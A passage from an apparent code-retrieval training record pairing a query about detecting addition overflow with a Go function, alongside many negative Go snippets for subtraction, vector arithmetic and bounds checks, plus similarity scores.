%d != %d\", e.Width, other.Width)\n\treturn NewConstantExpr(e.Value-other.Value, e.Width)\n}", "func (v1 *Vec) Sub(v2 *Vec) *Vec {\n\treturn Sub(v1, v2)\n}", "func (a Balance) Sub(b *Balance) Balance {\n\tfor i, v := range b {\n\t\ta[i] -= v\n\t}\n\treturn a\n}", "func sub(a string, b string) string {\n\tevenPad(&a, &b)\n\n\tdiff := \"\"\n\tc := false\n\tfor i := len(a) - 1; i >= 0; i-- {\n\t\taint, _ := strconv.Atoi(string(a[i]))\n\t\tbint, _ := strconv.Atoi(string(b[i]))\n\n\t\tif c {\n\t\t\taint--\n\t\t}\n\n\t\tif bint > aint {\n\t\t\taint += 10\n\t\t\tc = true\n\t\t} else {\n\t\t\tc = false\n\t\t}\n\n\t\td := aint - bint\n\n\t\tdiff = strconv.Itoa(d) + diff\n\t}\n\n\treturn unpad(diff)\n}", "func Bvsub(t1 TermT, t2 TermT) TermT {\n\treturn TermT(C.yices_bvsub(C.term_t(t1), C.term_t(t2)))\n}", "func (v Vec3) Sub(w Vec3) Vec3 {\n\treturn Vec3{v[0] - w[0], v[1] - w[1], v[2] - w[2]}\n}", "func (v Vec3i) Sub(other Vec3i) Vec3i {\n\treturn Vec3i{v.X - other.X, v.Y - other.Y, v.Z - other.Z}\n}", "func (cal *Calculate) sub(value float64) (result float64) {\n\tif len(cal.Arg) == 2 {\n\t\treturn (cal.Arg[0] - cal.Arg[1])\n\t} else if len(cal.Arg) == 1 {\n\t\treturn (value - cal.Arg[0])\n\t}\n\n\tlog.Fatalln(\"Please check the data format of the calculation unit\")\n\treturn\n}", "func (z *polyGF2) Sub(a, b *polyGF2) *polyGF2 {\n\treturn z.Add(a, b)\n}", "func (u Vec) Sub(v Vec) Vec {\n\treturn Vec{\n\t\tu.X - v.X,\n\t\tu.Y - v.Y,\n\t}\n}", "func (p *Point) Sub(to *Point) *Point {\n\treturn &Point{p.X - to.X, p.Y - to.Y}\n}", "func (f Fixed8) Sub(g Fixed8) Fixed8 {\n\treturn f - g\n}", "func (z *BiComplex) Sub(x, y *BiComplex) *BiComplex {\n\tz.l.Sub(&x.l, &y.l)\n\tz.r.Sub(&x.r, &y.r)\n\treturn z\n}", "func Substraction(a int, b int) int {\n\treturn a - b\n}", "func (v Posit16x2) Sub(x Posit16x2) Posit16x2 {\n\tout := Posit16x2{impl: make([]Posit16, 2)}\n\tfor i, posit := range v.impl {\n\t\tout.impl[i] = posit.Sub(x.impl[i])\n\t}\n\treturn out\n}", "func TestSub(t *testing.T) {\n\tfmt.Println(Sub(2,1))\n}", "func sub(a, b, carry int32) (int32, int32) {\n\ttrace_util_0.Count(_mydecimal_00000, 10)\n\tdiff := a - b - carry\n\tif diff < 0 {\n\t\ttrace_util_0.Count(_mydecimal_00000, 12)\n\t\tcarry = 1\n\t\tdiff += wordBase\n\t} else {\n\t\ttrace_util_0.Count(_mydecimal_00000, 13)\n\t\t{\n\t\t\tcarry = 0\n\t\t}\n\t}\n\ttrace_util_0.Count(_mydecimal_00000, 11)\n\treturn diff, carry\n}", "func (rg Range) Sub(p Point) Range {\n\trg.Max = rg.Max.Sub(p)\n\trg.Min = rg.Min.Sub(p)\n\treturn rg\n}", "func (p Point) Sub(other Point) Point {\n\treturn Pt(p.X-other.X, p.Y-other.Y)\n}", "func (a Vec2) SubScalar(b float64) Vec2 {\n\treturn Vec2{a.X - b, a.Y - b}\n}", "func (m Mat2f) Sub(other Mat2f) Mat2f {\n\treturn Mat2f{\n\t\tm[0] - other[0], m[1] - other[1],\n\t\tm[2] - other[2], m[3] - other[3]}\n}", "func (c *CSR) Sub(a, b mat.Matrix) {\n\tc.addScaled(a, b, 1, -1)\n}", "func (p *G2Jac) Sub(curve *Curve, a G2Jac) *G2Jac {\n\ta.Y.Neg(&a.Y)\n\tp.Add(curve, &a)\n\treturn p\n}", "func Sub(a uint8, b uint8, mc *microcontroller, borrow uint8) uint8 {\r\n\tresult16 := uint16(a) - uint16(b) - uint16(borrow)\r\n\tresult8 := uint8(result16)\r\n\tmc.zero = result8 == 0x0\r\n\tmc.sign = (result8 >> 7) == 0x1\r\n\tmc.parity = GetParity(result8)\r\n\tmc.carry = result16&0x100 > 0\r\n\r\n\tindex := (((a & 0x88) >> 1) | ((b & 0x88) >> 2) | ((result8 & 0x88) >> 3)) & 0x7\r\n\tmc.auxCarry = subHalfCarryTable[index]\r\n\treturn result8\r\n}", "func Subtract(a, operand int) int { return operand - a }", "func (d *GF255e) Sub(a, b *GF255e) *GF255e {\n\tgf_sub((*[4]uint64)(d), (*[4]uint64)(a), (*[4]uint64)(b), mq255e)\n\treturn d\n}", "func Sub(x, y Number) Number {\n\treturn Number{\n\t\tReal: x.Real - y.Real,\n\t\tE1mag: x.E1mag - y.E1mag,\n\t\tE2mag: x.E2mag - y.E2mag,\n\t\tE1E2mag: x.E1E2mag - y.E1E2mag,\n\t}\n}", "func (z fermat) Sub(x, y fermat) fermat {\n\tif len(z) != len(x) {\n\t\tpanic(\"Add: len(z) != len(x)\")\n\t}\n\tn := len(y) - 1\n\tb := subVV(z[:n], x[:n], y[:n])\n\tb += y[n]\n\t// If b > 0, we need to subtract b<<n, which is the same as adding b.\n\tz[n] = x[n]\n\tif z[0] <= ^big.Word(0)-b {\n\t\tz[0] += b\n\t} else {\n\t\taddVW(z, z, b)\n\t}\n\tz.norm()\n\treturn z\n}", "func addSub(a , b int) (int, int) {\n\n\treturn (a + b), (a-b)\n}", "func (v Vec3) Sub(v2 Vec3) Vec3 {\n\treturn Vec3{X: v.X - v2.X, Y: v.Y - v2.Y, Z: v.Z - v2.Z}\n}", "func (vn *VecN) Sub(dst *VecN, addend *VecN) *VecN {\n\tif vn == nil || addend == nil {\n\t\treturn nil\n\t}\n\tsize := intMin(len(vn.vec), len(addend.vec))\n\tdst = dst.Resize(size)\n\n\tfor i := 0; i < size; i++ {\n\t\tdst.vec[i] = vn.vec[i] - addend.vec[i]\n\t}\n\n\treturn dst\n}", "func (t Tuple) Sub(o Tuple) Tuple {\n\tif t.IsVector() && o.IsPoint() {\n\t\tpanic(\"cannot subtract point from vector\")\n\t}\n\treturn Tuple{t.X - o.X, t.Y - o.Y, t.Z - o.Z, t.W - o.W}\n}", "func (t *Tuple) Sub(o *Tuple) *Tuple {\n\treturn &Tuple{\n\t\tt.x - o.x,\n\t\tt.y - o.y,\n\t\tt.z - o.z,\n\t\tt.w - o.w,\n\t}\n\n}", "func Sub(t1 TermT, t2 TermT) TermT {\n\treturn TermT(C.yices_sub(C.term_t(t1), C.term_t(t2)))\n}", "func (v Vector) Sub(o Vector) *Vector {\n\treturn &Vector{v[0] - o[0], v[1] - o[1], v[2] - o[2]}\n}", "func (f *tmplFuncs) sub(x, y int) int { return x - y }", "func (a *Pattern) Sub(b *Pattern) *Pattern {\n\tvar st1, st2 charset\n\tif tocharset(a.tree, 0, &st1) && tocharset(b.tree, 0, &st2) {\n\t\tpatt := newcharset()\n\t\tb := treebuffer(patt.tree, 0)\n\t\tfor i := 0; i < charsetSize; i++ {\n\t\t\tb[i] = st1.cs[i] &^ st2.cs[i]\n\t\t}\n\t\treturn patt\n\t}\n\tpatt := newtree(2 + len(a.tree) + len(b.tree))\n\tpatt.tree[0].tag = tSeq\n\tpatt.tree[0].psn = 2 + int32(len(b.tree)) // ps\n\tpatt.tree[sib1(patt.tree, 0)].tag = tNot\n\tcopy(patt.tree[sib1(patt.tree, sib1(patt.tree, 0)):], b.tree)\n\tcopy(patt.tree[sib2(patt.tree, 0):], a.tree)\n\tjoinktables(patt, a, b, patt.tree, sib1(patt.tree, 0))\n\treturn patt\n}", "func (x IntRange) Sub(y IntRange) (z IntRange) {\n\tif x.Empty() || y.Empty() {\n\t\treturn makeEmptyRange()\n\t}\n\tif x[0] != nil && y[1] != nil && (x[1] != nil || y[0] != nil) {\n\t\tz[0] = big.NewInt(0).Sub(x[0], y[1])\n\t}\n\tif x[1] != nil && y[0] != nil && (x[0] != nil || y[1] != nil) {\n\t\tz[1] = big.NewInt(0).Sub(x[1], y[0])\n\t}\n\treturn z\n}", "func sm2P256Sub(c, a, b *sm2P256FieldElement) {\n\tvar carry uint32\n\n\tfor i := 0; ; i++ {\n\t\tc[i] = a[i] - b[i]\n\t\tc[i] += sm2P256Zero31[i]\n\t\tc[i] += carry\n\t\tcarry = c[i] >> 29\n\t\tc[i] &= bottom29Bits\n\t\ti++\n\t\tif i == 9 {\n\t\t\tbreak\n\t\t}\n\t\tc[i] = a[i] - b[i]\n\t\tc[i] += sm2P256Zero31[i]\n\t\tc[i] += carry\n\t\tcarry = c[i] >> 28\n\t\tc[i] &= bottom28Bits\n\t}\n\tsm2P256ReduceCarry(c, carry)\n}", "func (v Vec) Sub(other Vec) Vec {\n\treturn v.Copy().SubBy(other)\n}", "func (z *Float64) Sub(x, y *Float64) *Float64 {\n\tz.l = x.l - y.l\n\tz.r = x.r - y.r\n\treturn z\n}", "func (self *State)Abs(a any)any{\n self.IncOperations(self.coeff[\"abs\"]+self.off[\"abs\"])\n return wrap1(a,math.Abs)\n}", "func RatSub(z *big.Rat, x, y *big.Rat,) *big.Rat", "func funcAbs(vals []parser.Value, args parser.Expressions, enh *EvalNodeHelper) Vector {\n\treturn simpleFunc(vals, enh, math.Abs)\n}", "func (p *G1Affine) Sub(a, b *G1Affine) *G1Affine {\n\tvar p1, p2 G1Jac\n\tp1.FromAffine(a)\n\tp2.FromAffine(b)\n\tp1.SubAssign(&p2)\n\tp.FromJacobian(&p1)\n\treturn p\n}", "func (v *Vector) Sub(rhs *Vector) *Vector {\n\tif rhs == nil {\n\t\treturn v\n\t}\n\tif v == nil {\n\t\tv = &Vector{\n\t\t\tword: \"\",\n\t\t\tvec: make([]float64, len(rhs.vec)),\n\t\t\telems: nil,\n\t\t}\n\t}\n\n\tl := min(len(v.vec), len(rhs.vec))\n\tvec := make([]float64, l)\n\tcopy(vec, v.vec)\n\tsaxpy(l, -1, rhs.vec, 1, vec, 1)\n\telems := make([]string, len(v.elems)+len(rhs.elems))\n\telems = append(elems, rhs.elems...)\n\telems = append(elems, v.elems...)\n\treturn &Vector{\n\t\tword: v.word + \" - \" + rhs.word,\n\t\tvec: vec,\n\t\telems: elems,\n\t}\n}", "func DecimalSub(from1, from2, to *MyDecimal) error {\n\tfrom1, from2, to = validateArgs(from1, from2, to)\n\tto.resultFrac = mathutil.Max(from1.resultFrac, from2.resultFrac)\n\tif from1.negative == from2.negative {\n\t\t_, err := doSub(from1, from2, to)\n\t\treturn err\n\t}\n\treturn doAdd(from1, from2, to)\n}", "func (p Point) Sub(q Point) Point { return Point{p.X - q.X, p.Y - q.Y} }", "func (q Quat) Sub(other Quat) Quat {\n\treturn Quat{q.W - other.W, q.X - other.X, q.Y - other.Y, q.Z - other.Z}\n}", "func SUBB(imr, amr operand.Op) { ctx.SUBB(imr, amr) }", "func NewSubExpr(scanner parser.Scanner, a, b Expr) Expr {\n\treturn newArithExpr(scanner, a, b, \"-\", func(a, b float64) float64 { return a - b })\n}", "func Sub(dst, src []Float16) {\n\tif msg := sameLen(len(dst), len(src)); msg != \"\" {\n\t\tpanic(msg)\n\t}\n\tC.f16sub((*C.f16)(&dst[0]), (*C.f16)(&src[0]), C.int(len(src)))\n}", "func (v *Vector2) Subtract(b Vector2) {\r\n\tv.x -= b.x\r\n\tv.y -= b.y\r\n}" ]
[ "0.7009983", "0.6930586", "0.6803725", "0.66169053", "0.65832865", "0.65832865", "0.65832865", "0.6508825", "0.6508825", "0.6508825", "0.6458546", "0.6458546", "0.6458546", "0.6440195", "0.64367706", "0.6427443", "0.6413858", "0.64080596", "0.6405884", "0.637051", "0.634558", "0.6313116", "0.6310482", "0.63095474", "0.6295218", "0.6290764", "0.62826127", "0.6266846", "0.625067", "0.6237778", "0.6235906", "0.62351716", "0.62259686", "0.6218309", "0.6181839", "0.6175327", "0.6164981", "0.6139315", "0.612202", "0.60998595", "0.6096953", "0.60965717", "0.60927826", "0.6079622", "0.6063907", "0.60627604", "0.6036761", "0.60153514", "0.59993356", "0.59986377", "0.59945154", "0.59878945", "0.5987716", "0.5965916", "0.5962631", "0.5958274", "0.5945384", "0.59417486", "0.5932776", "0.5909132", "0.5888372", "0.58870095", "0.58734345", "0.5867081", "0.5850575", "0.584917", "0.5833212", "0.58250725", "0.58243597", "0.58198833", "0.58190745", "0.5817237", "0.58143383", "0.58089364", "0.57946134", "0.57858044", "0.57851225", "0.5784918", "0.5782596", "0.57670975", "0.57661194", "0.57621294", "0.5746681", "0.5739662", "0.572947", "0.57196414", "0.5711588", "0.56917745", "0.5688731", "0.567726", "0.5675104", "0.56683487", "0.5667686", "0.5662658", "0.5659074", "0.5650698", "0.56476945", "0.5644234", "0.5635684", "0.56337476" ]
0.7613036
0
Returns true when v + o would overflow max.
func addOverflows(v, o, max id.ID) bool { // o overflows when (max - v) < o maxDist := idSub(max, v) return id.Compare(maxDist, o) < 0 }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func bounded(n ir.Node, max int64) bool {\n\tif n.Type() == nil || !n.Type().IsInteger() {\n\t\treturn false\n\t}\n\n\tsign := n.Type().IsSigned()\n\tbits := int32(8 * n.Type().Size())\n\n\tif ir.IsSmallIntConst(n) {\n\t\tv := ir.Int64Val(n)\n\t\treturn 0 <= v && v < max\n\t}\n\n\tswitch n.Op() {\n\tcase ir.OAND, ir.OANDNOT:\n\t\tn := n.(*ir.BinaryExpr)\n\t\tv := int64(-1)\n\t\tswitch {\n\t\tcase ir.IsSmallIntConst(n.X):\n\t\t\tv = ir.Int64Val(n.X)\n\t\tcase ir.IsSmallIntConst(n.Y):\n\t\t\tv = ir.Int64Val(n.Y)\n\t\t\tif n.Op() == ir.OANDNOT {\n\t\t\t\tv = ^v\n\t\t\t\tif !sign {\n\t\t\t\t\tv &= 1<<uint(bits) - 1\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tif 0 <= v && v < max {\n\t\t\treturn true\n\t\t}\n\n\tcase ir.OMOD:\n\t\tn := n.(*ir.BinaryExpr)\n\t\tif !sign && ir.IsSmallIntConst(n.Y) {\n\t\t\tv := ir.Int64Val(n.Y)\n\t\t\tif 0 <= v && v <= max {\n\t\t\t\treturn true\n\t\t\t}\n\t\t}\n\n\tcase ir.ODIV:\n\t\tn := n.(*ir.BinaryExpr)\n\t\tif !sign && ir.IsSmallIntConst(n.Y) {\n\t\t\tv := ir.Int64Val(n.Y)\n\t\t\tfor bits > 0 && v >= 2 {\n\t\t\t\tbits--\n\t\t\t\tv >>= 1\n\t\t\t}\n\t\t}\n\n\tcase ir.ORSH:\n\t\tn := n.(*ir.BinaryExpr)\n\t\tif !sign && ir.IsSmallIntConst(n.Y) {\n\t\t\tv := ir.Int64Val(n.Y)\n\t\t\tif v > int64(bits) {\n\t\t\t\treturn true\n\t\t\t}\n\t\t\tbits -= int32(v)\n\t\t}\n\t}\n\n\tif !sign && bits <= 62 && 1<<uint(bits) <= max {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func tooLarge(x int) bool {\n\tconst max int = 1e6\n\treturn x > max || x < -max\n}", "func WillOverflow(a, b int64) bool {\n\t// Morally MinInt64 < a+b < MaxInt64, but without overflows.\n\t// First make sure that a <= b. If not, swap them.\n\tif a > b {\n\t\ta, b = b, a\n\t}\n\t// Now b is the larger of the numbers, and we compare sizes\n\t// in a way that can never over- or underflow.\n\tif b > 0 {\n\t\treturn a > math.MaxInt64-b\n\t}\n\treturn math.MinInt64-b > a\n}", "func chmax(updatedValue *int, target int) bool {\n\tif *updatedValue < target {\n\t\t*updatedValue = target\n\t\treturn true\n\t}\n\treturn false\n}", "func ChMax(updatedValue *int, target int) bool {\n\tif *updatedValue < target {\n\t\t*updatedValue = target\n\t\treturn true\n\t}\n\treturn false\n}", "func Max(val, max any) bool { return valueCompare(val, max, \"<=\") }", "func IsPowerOfTwo(v T) bool {\n\tif v == 0 {\n\t\treturn false\n\t}\n\treturn v&(v-1) == 0\n}", "func ConstOverflow(v constant.Value, t *types.Type) bool {\n\tswitch {\n\tcase t.IsInteger():\n\t\tbits := uint(8 * t.Size())\n\t\tif t.IsUnsigned() {\n\t\t\tx, ok := constant.Uint64Val(v)\n\t\t\treturn !ok || x>>bits != 0\n\t\t}\n\t\tx, ok := constant.Int64Val(v)\n\t\tif x < 0 {\n\t\t\tx = ^x\n\t\t}\n\t\treturn !ok || x>>(bits-1) != 0\n\tcase t.IsFloat():\n\t\tswitch t.Size() {\n\t\tcase 4:\n\t\t\tf, _ := constant.Float32Val(v)\n\t\t\treturn math.IsInf(float64(f), 0)\n\t\tcase 8:\n\t\t\tf, _ := constant.Float64Val(v)\n\t\t\treturn math.IsInf(f, 0)\n\t\t}\n\tcase t.IsComplex():\n\t\tft := types.FloatForComplex(t)\n\t\treturn ConstOverflow(constant.Real(v), ft) || ConstOverflow(constant.Imag(v), ft)\n\t}\n\tbase.Fatalf(\"ConstOverflow: %v, %v\", v, t)\n\tpanic(\"unreachable\")\n}", "func u(a, b interface{}) bool {\n\tav := a.(int)\n\tbv := b.(int)\n\n\tswitch {\n\tcase av < bv:\n\t\treturn true\n\tcase av >= bv:\n\t\treturn false\n\t}\n\treturn false\n}", "func (z *Int) AddOverflow(x, y *Int) bool {\n\tvar carry bool\n\tfor i := range z {\n\t\tz[i], carry = u64Add(x[i], y[i], carry)\n\t}\n\treturn carry\n}", "func Lt(val, max any) bool { return valueCompare(val, max, \"<\") }", "func (obj *interval) HasMax() bool {\n\treturn obj.max != -1\n}", "func limCalc(x, y, lim int) bool {\n\t// you can use short assignment within an if statement declaration\n\t// multiple if statements can be chained using ;\n\t// note that v cannot be used outside of the if statement, it is local to that chunk\n\tif v := x * y; v < lim {\n\t\treturn true\n\t} else {\n\t\t// we can still reference v here as an else block\n\t\t// is technically still part of the if statement\n\t\tfmt.Printf(\"Can use v here: %v\\n\", v)\n\t\treturn false\n\t}\n\t// cannot reference v from here onwards\n\t// now that we're outside of the if statement\n}", "func (z *Int) SubOverflow(x, y *Int) bool {\n\tvar (\n\t\tunderflow bool\n\t)\n\tz[0], underflow = u64Sub(x[0], y[0], underflow)\n\tz[1], underflow = u64Sub(x[1], y[1], underflow)\n\tz[2], underflow = u64Sub(x[2], y[2], underflow)\n\tz[3], underflow = u64Sub(z[3], y[3], underflow)\n\treturn underflow\n}", "func Lte(val, max any) bool { return valueCompare(val, max, \"<=\") }", "func (t *Check) Max(max, val int64) (bool, error) {\n\treturn max >= val, nil\n}", "func (x *Big) CmpAbs(y *Big) int { return cmp(x, y, true) }", "func (ft *factsTable) isNonNegative(v *Value) bool {\n\tif isNonNegative(v) {\n\t\treturn true\n\t}\n\n\tvar max int64\n\tswitch v.Type.Size() {\n\tcase 1:\n\t\tmax = math.MaxInt8\n\tcase 2:\n\t\tmax = math.MaxInt16\n\tcase 4:\n\t\tmax = math.MaxInt32\n\tcase 8:\n\t\tmax = math.MaxInt64\n\tdefault:\n\t\tpanic(\"unexpected integer size\")\n\t}\n\n\t// Check if the recorded limits can prove that the value is positive\n\n\tif l, has := ft.limits[v.ID]; has && (l.min >= 0 || l.umax <= uint64(max)) {\n\t\treturn true\n\t}\n\n\t// Check if v = x+delta, and we can use x's limits to prove that it's positive\n\tif x, delta := isConstDelta(v); x != nil {\n\t\tif l, has := ft.limits[x.ID]; has {\n\t\t\tif delta > 0 && l.min >= -delta && l.max <= max-delta {\n\t\t\t\treturn true\n\t\t\t}\n\t\t\tif delta < 0 && l.min >= -delta {\n\t\t\t\treturn true\n\t\t\t}\n\t\t}\n\t}\n\n\t// Check if v is a value-preserving extension of a non-negative value.\n\tif isCleanExt(v) && ft.isNonNegative(v.Args[0]) {\n\t\treturn true\n\t}\n\n\t// Check if the signed poset can prove that the value is >= 0\n\treturn ft.orderS.OrderedOrEqual(ft.zero, v)\n}", "func (x *biggerIntPair) raiseMax(y biggerInt) {\n\tif x[1].extra < 0 || y.extra > 0 ||\n\t\t(x[1].extra == 0 && y.extra == 0 && x[1].i.Cmp(y.i) < 0) {\n\t\tx[1] = y\n\t}\n}", "func IsUint64SumOverflow(a, b uint64) bool {\n\treturn math.MaxUint64-a < b\n}", "func (v Vector) MaxAbs() float64 {\n\tvar res float64\n\tfor _, x := range v {\n\t\tres = math.Max(res, math.Abs(x))\n\t}\n\treturn res\n}", "func CloseEnough(a, b, e float64) bool {\n return math.Abs(a - b) < e\n}", "func c(a, b interface{}) bool {\n\tav := a.(int)\n\tbv := b.(int)\n\n\tswitch {\n\tcase av > bv:\n\t\treturn true\n\tcase av <= bv:\n\t\treturn false\n\t}\n\treturn false\n}", "func isPowerOfTwo(val int) bool {\n\treturn (val != 0) && (val&(val-1)) == 0\n}", "func outOfBound(point Point, limit int) bool {\n\treturn point.x > limit || point.x < 0 || point.y > limit || point.y < 0\n}", "func (s VectOp) Maxv(v []float64) VectOp {\n\treturn fs.Maxv(s, v)\n}", "func chmin(updatedValue *int, target int) bool {\n\tif *updatedValue > target {\n\t\t*updatedValue = target\n\t\treturn true\n\t}\n\treturn false\n}", "func canJump(nums []int) bool {\n\tcount := len(nums)\n\n\tif count == 0 {\n\t\treturn false\n\t}\n\n\tmax := nums[0]\n\n\tfor i := 0; i <= max; i++ {\n\t\tvalue := i + nums[i]\n\n\t\tif value >= count-1 {\n\t\t\treturn true\n\t\t}\n\n\t\tif value > max {\n\t\t\tmax = value\n\t\t}\n\t}\n\n\treturn false\n}", "func ValidEval(v *big.Int) bool {\n\tif v.Sign() < 0 {\n\t\treturn false\n\t}\n\tif v.Cmp(bn256.Order) >= 0 {\n\t\treturn false\n\t}\n\treturn true\n}", "func (s VectOp) Max() float64 {\n\tmax := math.Inf(-1)\n\tfor _, val := range s {\n\t\tmax = math.Max(max, val)\n\t}\n\treturn max\n}", "func SafeVector(v [][]int64, lim int64) bool {\n\tfor _, cs := range v {\n\t\tfor _, c := range cs {\n\t\t\tif c < 0 || c >= lim {\n\t\t\t\treturn false\n\t\t\t}\n\t\t}\n\t}\n\treturn true\n}", "func checkVector(v1, v2 vec32.Vector, tol float32) bool {\n\tfor i := range v1 {\n\t\tif v2[i] > v1[i]+tol || v2[i] < v1[i]-tol {\n\t\t\treturn false\n\t\t}\n\t}\n\treturn true\n}", "func absValueIf(v int64, absolute bool) int64 {\n\tif absolute && v < 0 {\n\t\tv = -v\n\t}\n\treturn v\n}", "func Approx(x, y float32) bool {\n\teps := epsilon32 * 100\n\treturn Abs(x-y) < eps*(1.0+Max(Abs(x), Abs(y)))\n}", "func ChMin(updatedValue *int, target int) bool {\n\tif *updatedValue > target {\n\t\t*updatedValue = target\n\t\treturn true\n\t}\n\treturn false\n}", "func (x *Int) CmpAbs(y *Int) int {}", "func (bi Int) Equals(o Int) bool {\n\treturn Cmp(bi, o) == 0\n}", "func (r Range) Contains(v T) bool {\n\treturn r.Max >= v && r.Min <= v\n}", "func hasMaxOf(fl FieldLevel) bool {\n\treturn isLte(fl)\n}", "func (n Fixed64) Overflow() int {\n\tif n.i64 > maxInt64 {\n\t\treturn 1\n\t}\n\tif n.i64 < minInt64 {\n\t\treturn -1\n\t}\n\treturn 0\n}", "func pow2(x, n, lim float64) float64 {\n if v := math.Pow(x, n); v < lim {\n return v\n } else {\n fmt.Printf(\"%g >= %g\\n\", v, lim)\n }\n // can't use v here, though\n return lim\n}", "func convertibleToInt64(v model.SampleValue) bool {\n\treturn v <= maxInt64 && v >= minInt64\n}", "func is_extremum(dog_pyr [][]*SiftImage, octv, intvl, r, c int) bool {\n\tval := pixval32f(dog_pyr[octv][intvl], r, c)\n\t/* check for maximum */\n\tif val > 0 {\n\t\tfor i := -1; i <= 1; i++ {\n\t\t\tfor j := -1; j <= 1; j++ {\n\t\t\t\tfor k := -1; k <= 1; k++ {\n\t\t\t\t\tif val < pixval32f(dog_pyr[octv][intvl+i], r+j, c+k) {\n\t\t\t\t\t\treturn false\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t} else { /* check for minimum */\n\t\tfor i := -1; i <= 1; i++ {\n\t\t\tfor j := -1; j <= 1; j++ {\n\t\t\t\tfor k := -1; k <= 1; k++ {\n\t\t\t\t\tif val > pixval32f(dog_pyr[octv][intvl+i], r+j, c+k) {\n\t\t\t\t\t\treturn false\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\treturn true\n}", "func IsPowerOfTwo(x int) bool {\n\treturn (x & (-x)) == x\n}", "func VectorCloseEnough(a, b []float64, e float64) bool {\n if a == nil || b == nil {\n return false\n }\n if len(a) != len(b) {\n return false\n }\n\n for i := 0; i < len(a); i ++ {\n if !CloseEnough(a[i], b[i], e) {\n return false\n }\n }\n\n return true\n}", "func (x IntRange) orMax(y IntRange) *big.Int {\n\tif x[0].Sign() == 0 && y[0].Sign() == 0 {\n\t\ti := big.NewInt(0)\n\t\ti.And(x[1], y[1])\n\t\tbitFillRight(i)\n\t\ti.Rsh(i, 1)\n\t\ti.Or(i, x[1])\n\t\ti.Or(i, y[1])\n\t\treturn i\n\t}\n\n\t// Four examples:\n\t// - Example #0: x is [1, 3] and y is [ 4, 9], orMax is 11.\n\t// - Example #1: x is [3, 4] and y is [ 5, 6], orMax is 7.\n\t// - Example #2: x is [4, 5] and y is [ 6, 7], orMax is 7.\n\t// - Example #3: x is [7, 7] and y is [12, 14], orMax is 15.\n\n\ti := big.NewInt(0)\n\tj := big.NewInt(0)\n\n\t// j = droppable = bitFillRight((xMax & ~xMin) | (yMax & ~yMin))\n\t//\n\t// For example #0, j = bfr((3 & ~1) | ( 9 & ~ 4)) = bfr(2 | 9) = 15.\n\t// For example #1, j = bfr((4 & ~3) | ( 6 & ~ 5)) = bfr(4 | 2) = 7.\n\t// For example #2, j = bfr((5 & ~4) | ( 7 & ~ 6)) = bfr(1 | 1) = 1.\n\t// For example #3, j = bfr((7 & ~7) | (14 & ~12)) = bfr(0 | 2) = 3.\n\ti.AndNot(x[1], x[0])\n\tj.AndNot(y[1], y[0])\n\tj.Or(j, i)\n\tbitFillRight(j)\n\n\t// j = available = xMax & yMax & j\n\t//\n\t// For example #0, j = 3 & 9 & 15 = 1.\n\t// For example #1, j = 4 & 6 & 7 = 4.\n\t// For example #2, j = 5 & 7 & 1 = 1.\n\t// For example #3, j = 7 & 14 & 3 = 2.\n\tj.And(j, x[1])\n\tj.And(j, y[1])\n\n\t// j = bitFillRight(j) >> 1\n\t//\n\t// For example #0, j = bfr(1) >> 1 = 0.\n\t// For example #1, j = bfr(4) >> 1 = 3.\n\t// For example #2, j = bfr(1) >> 1 = 0.\n\t// For example #3, j = bfr(2) >> 1 = 1.\n\tbitFillRight(j)\n\tj.Rsh(j, 1)\n\n\t// return xMax | yMax | j\n\t//\n\t// For example #0, return 3 | 9 | 0 = 11.\n\t// For example #1, return 4 | 6 | 3 = 7.\n\t// For example #2, return 5 | 7 | 0 = 7.\n\t// For example #3, return 7 | 14 | 1 = 15.\n\tj.Or(j, x[1])\n\tj.Or(j, y[1])\n\treturn j\n}", "func TestIsEven_MaxLower64(t *testing.T) {\n\tif strconv.IntSize == 64 {\n\t\tin := math.MinInt64\n\t\texOut := true\n\t\teven := IsEven(in)\n\n\t\tif even != exOut {\n\t\t\tt.Errorf(\"Returned parity was incorrect, got: %t, want: %t.\", even, exOut)\n\t\t}\n\t}\n}", "func IsExceedsLimit(err error) bool {\n\treturn errors2.IsCausedBy(err, ErrExceedsLimit)\n}", "func isNonNegative(v *Value) bool {\n\tswitch v.Op {\n\tcase OpConst64:\n\t\treturn v.AuxInt >= 0\n\n\tcase OpConst32:\n\t\treturn int32(v.AuxInt) >= 0\n\n\tcase OpStringLen, OpSliceLen, OpSliceCap,\n\t\tOpZeroExt8to64, OpZeroExt16to64, OpZeroExt32to64:\n\t\treturn true\n\n\tcase OpRsh64Ux64:\n\t\tby := v.Args[1]\n\t\treturn by.Op == OpConst64 && by.AuxInt > 0\n\n\tcase OpRsh64x64:\n\t\treturn isNonNegative(v.Args[0])\n\t}\n\treturn false\n}", "func (bi Int) GreaterThan(o Int) bool {\n\treturn Cmp(bi, o) > 0\n}", "func (v *parameter) HasExclusiveMaximum() bool {\n\treturn v.exclusiveMaximum != nil\n}", "func _pow(x, n, lim float64) float64 {\n\tif v := math.Pow(x, n); v < lim {\n\t\treturn v\n\t} else {\n\t\tfmt.Printf(\"%g >= %g\\n\", v, lim)\n\t}\n\t// can't use v here, though\n\treturn lim\n}", "func (i *Number) IsBelow(v Number) bool {\n\treturn i.value < v.value\n}", "func (r *FileSizeRotator) reachLimit(n int) bool {\n\tatomic.AddUint64(&r.currSize, uint64(n))\n\tif r.currSize > r.limitSize {\n\t\treturn true\n\t}\n\treturn false\n}", "func (v RangeInt) Test(value int) bool {\n\treturn TestInt(v.min, v.max, value, v.minExclusive, v.maxExclusive)\n}", "func increasingTriplet(nums []int) bool {\n c1, c2 := math.MaxInt32, math.MaxInt32\n for i:=0; i<len(nums); i++ {\n if nums[i] <= c1 {\n c1 = nums[i]\n } else if nums[i] <= c2 {\n c2 = nums[i]\n } else {\n return true\n }\n }\n return false\n}", "func (v *parameter) HasMaximum() bool {\n\treturn v.maximum != nil\n}", "func max(x, y float64) float64 {\n\tswitch {\n\tcase math.IsNaN(x) || math.IsNaN(y):\n\t\treturn math.NaN()\n\tcase math.IsInf(x, 1) || math.IsInf(y, 1):\n\t\treturn math.Inf(1)\n\n\tcase x == 0 && x == y:\n\t\tif math.Signbit(x) {\n\t\t\treturn y\n\t\t}\n\t\treturn x\n\t}\n\tif x > y {\n\t\treturn x\n\t}\n\treturn y\n}", "func checkVar( x float64 ) bool {\n\n\tif x > 0 && x != math.Inf(-1) 